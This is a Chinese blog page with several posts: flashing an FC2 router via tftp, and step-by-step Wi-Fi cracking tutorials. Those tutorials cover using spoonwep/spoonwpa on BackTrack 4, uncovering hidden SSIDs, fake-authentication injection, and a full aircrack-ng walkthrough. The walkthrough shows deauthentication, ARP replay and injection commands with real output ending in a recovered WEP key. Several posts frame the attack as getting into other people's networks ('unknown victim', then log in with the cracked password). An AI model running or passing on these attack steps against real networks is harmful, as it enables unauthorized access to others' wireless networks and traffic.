FC2 Wifi刷openwrt或者DD-WRT

作者:W.S.T 发布时间:September 27, 2013 分类:Wlan

上个月就收到了这个小日本的路由,无奈破事一堆就丢那里,最近得空,想起来这货还在,最近举国抗日,咱也不能让小鬼子通过这些东西收集咱信息不是?为免除后患,刷了它!FC2 Wifi路由不支持在windows下刷机,所以,建议大家用虚拟机装CentOS或者ubuntu来刷。由于赵容在今年4月份为了写VMware虚拟机安装CentOS而安装的还在,所以,我就直接在CentOS下刷了。

准备和连线

1.先将FC2无线路由的LAN口连接到电脑(也可以是连到目前的路由器上,我便是),插上FC2路由器电源通电。

2.启动虚拟机CentOS系统,以root用户登录,安装tftp

yum install tftp

3.下载固件,放入root目录

cd /root

wget http://dl.zrblog.net/jp.bin

刷回原版系统

接下来,我们需要将FC2无线路由器刷回日本原版的系统。

首先,停掉网络和设定本机IP地址以及指定路由器IP。

/etc/init.d/network stop

sudo ifconfig eth0 192.168.11.2

sudo ifconfig eth0 netmask 255.255.255.0

sudo arp -s 192.168.11.1 xxxxxxxxxxxx(路由器的MAC地址,在收到的那张单子上有的)

然后,开工刷机(按照步骤)

#tftp

to***直接回车

tftp> verbose

Verbose mode on.  

tftp> binary

mode set to octet.

tftp> trace

Packet tracing on.

tftp> rexmt 1

tftp> timeout 60

tftp> connect 192.168.11.1

这时候,有个连接的提示,什么端口69之类的。

阅读剩余部分...

bt4-final下spoonwep+spoonwpa破解wep,wpa加密的Wlan

作者:W.S.T 发布时间:May 31, 2010 分类:Wlan

一、首先下载工具:

1、下载BT4正式版(bt4 cn final):
   地址:http://ftp.heanet.ie/mirrors/backtrack/bt4-pre-final.iso

2、下载U盘启动制作工具:unetbootin-windows-356

     地址:http://www.atuonce.cn/blog/attachments/month_0906/t2009621225526.rar

3、下载spoonwep-wpa破解工具用于bt4 final下的安装包

迅雷下载地址:
thunder://QUFodHRwOi8vbXkueHd0b3AuY29tL2ZpbGVteS8yMDA5MDUxNy82NzljMTNkMi4xLmRlYlpa

二、运行unetbootin制作bt4 final的U盘启动系统。


点确定就开始制作了。
从ISO文件里提取文件拷贝到U盘里需要一段时间。

完成之后,不要重启, 把刚刚下的“spoonwep-wpa破解工具用于bt4 final下的安装包”拷贝到U盘根目录下面, 自己记好它好的名字, 方便在bt4 final下找到它。

三、启动bt4 final

在BIOS里面设置从U盘启动.

四、进入bt4 final

登陆的用户名:root,密码:toor
startx命令启动图形化界面。

五、安装spoonwep-wpa-rc3.deb包

点击左下角的开始菜单,点击一个叫system mune的弹出菜单,再点击“storeage media”,会打开一个窗口,点击窗口上面有个刷新的按钮,在窗口下面空白的地方会列出你的硬盘和外设,进入U盘,找到刚才放入的spoonwep-wpa-rc3.deb,把这个文件复制到bt4-final的桌面,可以直接拖到桌面,打开命令行窗口

运行“dpkg -i spoonwep-wpa-rc3.deb”

稍等几秒中,桌面上出现desktop的文件夹,里面就有了spoonwep2+spoonwpa,好了,大功告成,直接单击图标就能运行spoonwep2spoonwpa了。

也可以输入以下命令执行:
spoonwep2 执行:
spoonwep2

spoonwpa
执行:
spoonwpa

六、开始破解!

spoonwep2 破解法】

输入spoonwep2回车后就会弹出spoonwep2的窗口。
点击SPOONWEP SETTINGS,在NET CARD里选WLAN0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索,然后关闭spoonwep2再开一下,点击SPOONWEP SETTINGS,在NET CARD里选MON0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索后就可以看见好多网卡啦,选定1个网卡点击SelectION OK,选定PO841 REPLAY ATTACK(这里有4条命令选择),点击LAUNCH后就等待密码的出来(sata数据包到30000个左右)。

spoonwpa 破解法】

输入spoonwpa回车后就会弹出spoonwpa的窗口。
在NET CARD里选WLAN0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索,然后关闭spoonwpa再开一下,点击SPOONWEP SETTINGS,在NET CARD里选MON0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索后就可以看见好多网卡啦,选定1个必须有客户端的网卡点击SelectION OK, 再点击LAUNCH AUTOMATED HANDSHAKE CAPTURE,如抓到握手包,请点击金色锁开始破解,这完全靠运气了。

七、用你破解出来的密码去登陆吧

个人原创, 转发请标明来源网址,有什么问题欢迎留言, 我会及时解答, 谢谢!


三分钟破解隐藏SSID无线网络

作者:W.S.T 发布时间:August 3, 2009 分类:Wlan

一、什么是SSID:
    SSID(Service Set Identifier)也可以写为ESSID,用来区分不同的网络,最多可以有32个字符,无线网卡设置了不同的SSID就可以进入不同网络,SSID通常由AP广播出来,通过XP自带的扫描功能可以相看当前区域内的SSID。出于安全考虑可以不广播SSID,此时用户就要手工设置SSID才能进入相应的网络。简单说,SSID就是一个无线局域网的名称,只有设置为名称相同SSID的值的电脑才能够连接到同一个无线网络中互相通信$ c6 P1 C7 ]6 H  v' i# S6 D9 h
二、三分钟破解隐藏SSID无线网络:
一般来说用户可以通过路由或主机设置来隐藏无线信号的SSID网络信息,在这种情况下我们使用XP系统自带的无线信号扫描工具将看不到该无线网络的踪影,在这种情况下XP系统无线信号管理工具只能够看到将SSID广播的无线网络。 那么如何来查找那些隐藏了SSID信息的无线网络呢?一般情况下我们并不知道他的SSID信息,只要知道了就可以通过一些破解工具来抓包从而达到入侵的目的。实际上查找到隐藏SSID广播的无线网络ID并不难我们可以借助相关工具来完成。
(1)通过netstumbler扫描:
    在之前的文章中我们多次介绍过netstumbler这个无线信号扫描工具的使用方法,今天讲解的破解隐藏SSID无线网络的方法也是通过他来完成。首先我们安装netstumbler,然后选择网卡进行扫描,从扫描到的结果中我们可以明显看到有些网络的SSID信息是空的,这些网络就是隐藏了SSID广播的无线网络,例如本例中的MAC地址为001122334457的地址,不过就算他隐藏了SSID信息我们也可以通过netstumbler了解他的基本参数情况,例如通过后面的速度,类别,加密方式以及信号频段等等信息我们可以了解到这个没有广播SSID的无线网络具体参数信息。


当然通过netstumbler的device参数下更改网卡类别后我们可以看到有更多的无线网络显示出来,具体操作各位读者还是要根据实际去选择。


    为了能够最大限度的扫描到当前环境周边的无线网络,我们可以通过netstumbler的device菜单下的use any suitable device选项来查看。

    选择完毕后我们可以看到所有广播SSID以及关闭广播的无线网络都能够清晰的显示在netstumbler右边的窗口中,所记录的信息包括当前正在工作的无线网络以及之前扫描过的无线网络信息。

(2)通过DD-WRT扫描:

    除了通过netstumbler在本机器扫描隐藏SSID号的无线网络外我们还可以通过DD-WRT固件自带的工具查找到这类无线网络。具体操作如下。
    首先登录到DD-WRT管理界面中,然后找到“无线管理”下的“wi-viz”按钮,开启“wi-viz”无线扫描工具。开启后我们会看到“wi-viz”会自动扫描当前DD-WRT无线路由器周围的无线网络,如果能够找到无线网络的SSID信息就会直接显示出来,例如本例中的softer,如果对方隐藏了SSID信息那么会直接显示无线路由器的MAC地址,例如本例中的00:19:e0:cc:95:be。

点对应的MAC地址00:19:e0:cc:95:be后我们也可以从旁边的access point信息中看到该无线网络的信号,使用的频段,是否加密以及加密方式等信息。
    利用“wi-viz”我们不光可以扫描到周边环境中存在的无线路由器,无线网络,包括无线客户端也可以顺利扫描到。总之凡是发现找到某个无线网络但是名称为MAC地址形式的,他就应该是隐藏了SSID广播的无线网络。


    三、总 结:
   隐藏了SSID网络号广播的无线网络并不安全,本文通过两个例子将这些网络找了出来,希望通过本文可以让更多的人重视无线网络安全,不要只使用隐藏SSID广播这种方法进行安全防范,必要时一定要结合WEP,WPA等加密方式同时通过MAC地址过滤来阻止非法入侵者。


利用假连接通过spoonwep2或命令破解无客户端无线密码

作者:W.S.T 发布时间:August 3, 2009 分类:Wlan

首先先介绍用spoonwep2来破解。Spoonwep比较初级,适合新手学习。
这次测试是用我自己的TP-LINK路由,以保证不会再试验过程中有合法客户端连接。



由于是自己的路由,mac地址已经知道。所以在mode一项选择了KNOWN VICTIM,直接输入mac地址,节约时间。




我们选择第二种交互注入,注入速率拉到最大1000,输入mac地址后点launch开始注入。




可以看到,这里并没有客户端,data也一直保持0。实际视频中,大家会发现data会有动静。这是因为我的路由有时会自己给自己发包,但是数据很少,完全无法破解(用字典破解除外)。


下面我们开始假连接。










上图中我们可以得到很多消息。首先是data开始增长了,但是速度并不快。最后一行我们可以看见有客户端了,这是我进行假连的网卡。在rate一栏,我们可以看到是0-1,这表示并没有进行有效连接,而且数据传输很慢。如果以合法客户端连接的话,则会显示54-54(我的是54M无线路由)。


系统提示无法连接。但是我们的抓包速度已经上升了,这是因为通过假连接使路由发包,于是就能得到包含密匙的数据包,注入也就成功了。但是由于rate很低,没一会#/s又会下降,所以要不断进行假连,保证较高的速率。实际效果可以在我的视频里看到。







抓到10000以上后就会开始破解,没一会密码就出来了。




下面,我再介绍一下命令法。适合有一定命令基础的朋友研究。

具体的命令含义请大家参考haohamaru的帖子(最后我会给出),也可以在论坛里找一下命令详解之类的。

先用ifconfig -a查看网卡mac




然后用下面两条命令加载网卡驱动并开启监听模式。




下面捕捉一下数据包。这一步可以在注入后再执行。但是为了体现变化过程,就在现在使用。其中,--bssid参数是指捕捉指定bssid。因为用自己的路由,所以直接输入以过滤其他路由的干扰。








好,我们开始-1虚连接。(不是假连接)





下面我们用最常用的-5碎片注入。











我放弃一开始的两个包,然后注入。这里是个转折点。很多朋友都会卡在这里。我也在这个地方卡了一个星期,一直得不到xor文件。我参考过haohamaru大人的帖子,他在这一步得到了xor。在视频制作过程中,我也奇迹般的得到了,还不止一次。这真是让我哭笑不得哈~但是第二天重新试验时又不行了。从一个侧面可以看到,类似haohamaru大人的方法,的确可以成功,也有不少朋友成功了。但是很需要人品。所以,我建议大家,如果之前的方法卡住了,就试试假连接吧。


不说废话了,我们继续。





假连接后我们得到了xor文件。下面就是打包,并注入arp






注入开始了。等待data增长的过程中,不停地假连。等到15000,差不多就能破解了。






密码出来了。

破解隐藏ESSID和共享密钥认证的WEP密码

作者:W.S.T 发布时间:June 21, 2009 分类:Wlan

破解隐藏ESSID和共享密钥认证的WEP密码

序言:欲成功破解隐藏ESSID和共享密钥认证的WEP密码,必需有合法的客户端;否则一切徒劳无功。以下是本人经过多次实践获得的经验,与各位兄弟姐妹分享。

root@bt:~# ifconfig -a
eth0      Link encap:Ethernet HWaddr 00:03:0D:65:EC:EF
          BROADCAST MULTICAST MTU:1500 Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
          Interrupt:19 Base address:0xa000
eth1      Link encap:UNSPEC HWaddr 00-15-F2-00-00-00
          UP BROADCAST NOTRAILERS PROMISC ALLMULTI MTU:1500 Metric:1
          RX packets:289685 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:11280435 (10.7 MiB) TX bytes:0 (0.0 b)
          Interrupt:11
lo        Link encap:Local Loopback
          inet addr:127.0.0.1 Mask:255.0.0.0
          UP LOOPBACK RUNNING MTU:16436 Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

1. 此命令用于查找自己无线网卡的MAC地址及在BT下的监听端口,也可以理解为无线网卡的别名。
注:这里获得的信息是MAC地址为00-15-F2-00-00-00,监听端口为eth1

root@bt:~# ifconfig -a eth1
eth1      Link encap:UNSPEC HWaddr 00-15-F2-00-00-00
          UP BROADCAST NOTRAILERS PROMISC ALLMULTI MTU:1500 Metric:1
          RX packets:295529 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:11545931 (11.0 MiB) TX bytes:0 (0.0 b)
          Interrupt:11

2. 此命令用于激活无线网卡的监听端口eth1

root@bt:~# airmon-ng start eth1 1
Interface       Chipset         Driver
eth1            Broadcom        bcm43xx (monitor mode enabled)

3. 此命令用于将无线网卡置于monitor(监听)模式,并且指定监控的频道。
注:此处的eth1为第一步中获得的监听端口;1为无线AP的频道,可用相应软件获得。

root@bt:~# airodump-ng --ivs -w 0523 -c 1 eth1
[CH 1 ][ Elapsed: 4 s ][ 2009-05-23 09:40]
BSSID              PWR  RXQ Beacons    #Data, #/s CH MB ENC CIPHER AUTH   ESSID
00:1E:40:87:45:BB    0     100       61        0    0   1 54 WEP  WEP           <length: 13>
BSSID              STATION            PWR   Rate Lost Packets Probes

4. 此命令用于获得无线AP的MAC地址及名称。此处无线AP的MAC地址为00:1E:40:87:45:BB,因为无线AP设置了隐藏ESSID,所以此命令尚无法获得AP名称。
注:无线AP的MAC地址即BSSID下面的内容,无线AP名称为ESSID下面的内容。

[CH 1 ][ Elapsed: 3 mins ][ 2009-05-23 1 09:43 ][ Broken SKA: 00:1E:40:87:45:BB]
BSSID              PWR  RXQ Beacons   #Data, #/s CH MB ENC CIPHER  AUTH     ESSID
00:1E:40:87:45:BB    0     100    18221    26151   0   1 54 WEP WEP    SKA   ChinaNet-W4J7
BSSID              STATION            PWR   Rate Lost Packets Probes
00:1E:40:87:45:BB 00:21:5D:36:94:04    0   0- 0    48    11621 ChinaNet-W4J7

5. 当ESSID被隐藏时,可用aireplay-ng -0 1 -a 00:1E:40:87:45:BB -c 00:21:5D:36:94:04 eth1来获得无线AP的名称。
注:00:1E:40:87:45:BB为无线AP的MAC地址,00:21:5D:36:94:04为合法客户端的MAC地址,eth1为第一步中获得的监听端口名称。
其实只要有合法的客户端连上了无线AP,其ESSID会自动显示出来,可以不用上述命令获得ESSID;所以此命令可以不执行,待合法客户端自己连上无线AP,自动获得无线AP的ESSID。

root@bt:~# aireplay-ng -3 -b 001e408745bb -h 00215d369404 eth1
The interface MAC (00:15:F2:00:00:00) doesn't match the specified MAC (-h).
        ifconfig eth1 hw ether 00:21:5D:36:94:04
09:41:37 Waiting for beacon frame (BSSID: 00:1E:40:87:45:BB) on channel 1
Saving ARP requests in replay_arp-0523-094137.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
……
Read 854654 packets (got 23571 ARP requests and 259428 ACKs), sent 352396 packets...(500 pps)

6. 此命令用于获得破解的数据包。
注:00:1E:40:87:45:BB为无线AP的MAC地址,00:21:5D:36:94:04为合法客户端的MAC地址,eth1为第一步中获得的监听端口名称。


root@bt:~# aireplay-ng -2 -x 1024 eth1
For information, no action required: Using gettimeofday() instead of /dev/rtc
No source MAC (-h) specified. Using the device MAC (00:15:F2:00:00:00)
Read 8431 packets...
        Size: 368, FromDS: 0, ToDS: 1 (WEP)
              BSSID = 00:1E:40:87:45:BB
          Dest. MAC = FF:FF:FF:FF:FF:FF
         Source MAC = 00:21:5D:36:94:04
        0x0000: 0841 2c00 001e 4087 45bb 0021 5d36 9404 .A,...@.E..!]6..
        0x0010: ffff ffff ffff 704d 0300 0000 afd9 860a ......pM........
        0x0020: 5954 8dd4 07d4 633f 0858 b8eb 9331 b035 YT....c?.X...1.5
        0x0030: 5fbb fc0f e087 e0f0 4e6b dcf9 9fda eadd _.......Nk......
        0x0040: 8f61 a8ca 0e2f d955 e7fa bfc9 8200 29e2 .a.../.U......).
        0x0050: ec0c 8398 063b df69 3ce0 3035 ccd7 68d7 .....;.i<.05..h.
        0x0060: eb5d 1a5b 75cb 6d84 7b83 e057 abab c292 .].[u.m.{..W....
        0x0070: a4bd 49c3 31aa ffa0 5793 adb1 6d17 2b1a ..I.1...W...m.+.
        0x0080: 6e41 898c e65b 2332 7e2c 4f2f 0640 0647 nA...[#2~,O/.@.G
        0x0090: baea faaa 995d 9b7f 2efb 5da6 66d8 5971 .....]...].f.Yq
        0x00a0: 336b 9b49 c1f6 8736 fe2b b2ee 007b c71b 3k.I...6.+...{..
        0x00b0: e7ba 51c5 c70f d31f 97d8 737f 3bda 00f6 ..Q.......s;...
        0x00c0: 760e 64cf b112 b2b9 44a0 d9a7 3349 c88b v.d.....D...3I..
        0x00d0: 551f 0780 3817 84e8 a2ba b6b2 4b95 2a86 U...8.......K.*.
        --- CUT ---
Use this packet ? y
Saving chosen packet in replay_src-0523-095442.cap
You should also start airodump-ng to capture replies.

7. 此命令用于攻击无线AP,此命令开始执行时,会捕获一个数据包,按Y,接着执行攻击。捕获的数据包如果是正确的,可以看见第四步窗口中的DATA下面的数字迅速猛涨。
注:-x后面的1024为攻击速度,eth1为第一步中获得的监听端口名称。


root@bt:~# aircrack-ng -n 64 *.ivs
Opening 0523-01.ivs
Read 7801 packets.
   # BSSID              ESSID                     Encryption
   1 00:1E:40:87:45:BB ChinaNet-W4J7             WEP (7800 IVs)
Choosing first network as target.
Opening 0523-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 7800 ivs.
                                 Aircrack-ng 1.0 rc1 r1085
                 [00:02:56] Tested 261076 keys (got 16216 IVs)
   KB    depth   byte(vote)
    0    5/ 34   07(20480) 4B(20480) 89(20480) 11(20224) 1B(20224)
    1    4/ 12   96(20736) 7A(20224) B7(19968) C1(19968) 8A(19712)
    2    0/ 7   21(23040) AD(22016) 9A(20736) F7(20480) 2A(20480)
    3    8/ 11   09(19968) 0F(19712) 50(19712) 58(19712) 96(19712)
    4    2/ 9   88(22016) 0E(21760) 28(21760) C4(20736) 70(20736)
                         KEY FOUND! [ 07:96:21:92:88 ]
StartingDecrypted correctly: 100%s.

8. 当第四步中的DATA达到10000以上时,新开窗口,尝试破解无线AP密码。
注:-n后面的64表示密码位数,如果不知道具体的位数,可用aircrack-ng *.ivs命令破解,让命令自动判断位数并进行破解。


下面的这个窗口报告的是与无线路由器握手的命令,即连接无线AP的命令,本人并使用此命令就已成功破解了无线AP密码。所以个人以为此命令和其他破解教程中说到的许多命令一样,并不是每个命令都需要执行才能成功破解密码。

root@bt:~# aireplay-ng -1 0 -e ChinaNet-W4J7 -a 001e408745bb -h 00215d369404 eth1
The interface MAC (00:15:F2:00:00:00) doesn't match the specified MAC (-h).
        ifconfig eth1 hw ether 00:21:5D:36:94:04
09:46:44 Waiting for beacon frame (BSSID: 00:1E:40:87:45:BB) on channel 1
09:46:44 Sending Authentication Request (Open System) [ACK]
09:46:44 Switching to shared key authentication
Read 5247 packets...
09:54:42 Sending Authentication Request (Shared Key) [ACK]
09:54:42 Authentication 1/2 successful
09:54:42 You should specify a xor file (-y) with at least 151 keystreambytes
09:54:42 Trying fragmented shared key fake auth.
09:54:42 Sending encrypted challenge. [ACK]
09:54:42 Got a deauthentication packet! (Waiting 3 seconds)
……
10:11:15 Sending Authentication Request (Shared Key) [ACK]
10:11:17 Sending Authentication Request (Shared Key)
Attack was unsuccessful. Possible reasons:
    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
      the transmit rate.
root@bt:~#

总结:经过本人多次实践,欲破解隐藏了ESSID或采用共享方式的WEP密码,必须有合法的客户端。大家看完我的教程,其中的MAC地址用的都是合法客户端的地址,一次都未使用到本人无线网卡的MAC地址;所以伪装MAC地址这一步在有合法客户端的地址时是可以省略的。还有数据量丰富的时候,即DATA数据猛涨的时候,执行完前面四步,就可以直接执行第八个步骤,大多情况下都能成功破解无线AP的密码。